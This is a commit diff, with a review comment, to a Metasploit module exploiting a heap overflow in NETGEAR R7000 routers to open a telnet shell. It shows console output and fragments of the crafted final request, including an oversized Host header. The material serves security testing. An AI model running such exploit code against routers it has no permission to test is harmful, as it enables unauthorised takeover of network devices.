Add in timeout to 10th and final request to prevent module from throwing errors like it isn't working when it really is

Grant Willcox 2021-07-28 11:32:47 -05:00
parent a13f6a35dc
commit a518fcac98
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
2 changed files with 5 additions and 11 deletions


@ -51,9 +51,8 @@ msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > run
[*] Executing automatic check (disable AutoCheck to override)
[*] Router is a NETGEAR router (R7000)
[+] The target is vulnerable.
[*] Sending 10th and final packet. The exploit should hang at this point.
[*] Connect to the telnet shell by running: telnet 192.168.1.1
[+] Exploit complete, connect to your shell!
[*] Sending 10th and final packet...
[*] If the exploit succeeds, you should be able to connect to the telnet shell by running: telnet 192.168.1.1
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) >
```


@ -311,8 +311,7 @@ class MetasploitModule < Msf::Auxiliary
send_data = post_data.to_s
send_data.sub!(/\r\n--#{post_data.bound}--\r\n/, '')
print_status('Sending 10th and final packet. The exploit should hang at this point.')
print_status("Connect to the telnet shell by running: telnet #{datastore['RHOST']}")
print_status('Sending 10th and final packet...')
res = send_request_cgi({
'method' => 'POST',
@ -321,13 +320,9 @@ class MetasploitModule < Msf::Auxiliary
'agent' => nil, # Disable sending the User-Agent header
'headers' => { 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}\r\n#{Rex::Text.rand_text_alpha(512)}: #{Rex::Text.rand_text_alpha(9)}" },
'data' => send_data
})
}, 0)
if !res.nil?
fail_with(Failure::UnexpectedReply, 'The target R7000 router responded on the tenth packet!')
end
print_good('Exploit complete, connect to your shell!')
print_status("If the exploit succeeds, you should be able to connect to the telnet shell by running: telnet #{datastore['RHOST']}")
end
def run
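Review bot: After this change `res` in `res = send_request_cgi({ ... }, 0)` is assigned but never read, because the `if !res.nil?` check that consumed it is removed, and the bare `0` carries no explanation. I would drop the assignment and document the argument, e.g. `send_request_cgi({ ... }, 0) # timeout 0: do not wait for a reply to the final request`, assuming that is what a zero timeout means to the HTTP client here. With the reply check gone, the method prints the same closing status whether or not the request was delivered, so a short comment above the final `print_status` should state that module completion no longer indicates success. The enclosing method starts above the hunk.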